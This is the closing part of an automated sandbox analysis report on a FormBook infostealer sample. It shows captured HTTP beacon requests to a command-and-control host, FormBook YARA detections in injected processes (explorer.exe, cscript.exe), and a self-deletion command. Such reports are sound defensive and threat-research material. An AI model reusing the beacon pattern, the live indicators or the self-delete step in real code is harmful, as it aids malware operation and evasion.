                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.3 | 49810 | 45.8.125.8 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Dec 2, 2021 20:01:18.436930895 CET | 8482 | OUT | GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1
                                    Host: www.fastbest.host
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:01:18.510102034 CET | 8483 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx/1.20.1
                                    Date: Thu, 02 Dec 2021 19:01:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 7081
                                    Connection: close
                                    Last-Modified: Mon, 27 Sep 2021 00:52:07 GMT
                                    ETag: "1ba9-5ccef81a2c93b"
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 61 73 74 62 65 73 74 20 2d 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b4 d0 bb d1 8f 20 d0 ba d0 b0 d0 b6 d0 b4 d0 be d0 b3 d0 be 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 73 71 55 49 6d 44 43 56 4b 41 73 37 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 36 30 30 3b 37 30 30 3b 38 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4a 6f 73 65 66 69 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 
65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 51 44 54 38 59 66 4e 30 42 46 63 4d 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 68 4b 66 71 4e 6a 77 58 50 53 7a 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 61 74 54 63 73 52 4a 4f 4c 6f 4d 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 6f 68 4f 71 6c 77 38 70 6c 39 6e 68 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4c 43 50 36 72 75 4c 70 4d 48 5a 58 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4a 35 68 6c 79 71 37 76 34 4c 71 49 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 65 75 76 7a 64 30 52 4f 37 4d 6e 75 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 56 4b 65 49 68 34 52 47 67 34 30 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content> <title>fastbest - </title> <link rel="icon" type="image/png" href="sqUImDCVKAs7.ico"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&amp;display=swap" rel="stylesheet"> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:wght@400;500;600;700&amp;display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/QDT8YfN0BFcM.css"> <link rel="stylesheet" href="css/hKfqNjwXPSze.css"> <link rel="stylesheet" href="css/atTcsRJOLoMl.css"> <link rel="stylesheet" href="css/ohOqlw8pl9nh.css"> <link rel="stylesheet" href="css/LCP6ruLpMHZX.css"> <link rel="stylesheet" href="css/J5hlyq7v4LqI.css"> <link rel="stylesheet" href="css/euvzd0RO7Mnu.css"> <link rel="stylesheet" href="css/rVKeIh4RGg40.css"> <link rel="stylesh


                                    Code Manipulations

                                    Statistics

                                    Behavior


                                    System Behavior

                                    General

                                    Start time: 19:59:12
                                    Start date: 02/12/2021
                                    Path: C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit): true
                                    Commandline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase: 0x400000
                                    File size: 318467 bytes
                                    MD5 hash: 83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation: low

                                    General

                                    Start time: 19:59:14
                                    Start date: 02/12/2021
                                    Path: C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit): true
                                    Commandline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase: 0x400000
                                    File size: 318467 bytes
                                    MD5 hash: 83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:19:59:18
                                    Start date:02/12/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:59:40
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                    Imagebase:0x1300000
                                    File size:143360 bytes
                                    MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    General

                                    Start time:19:59:44
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:59:46
                                    Start date:02/12/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis
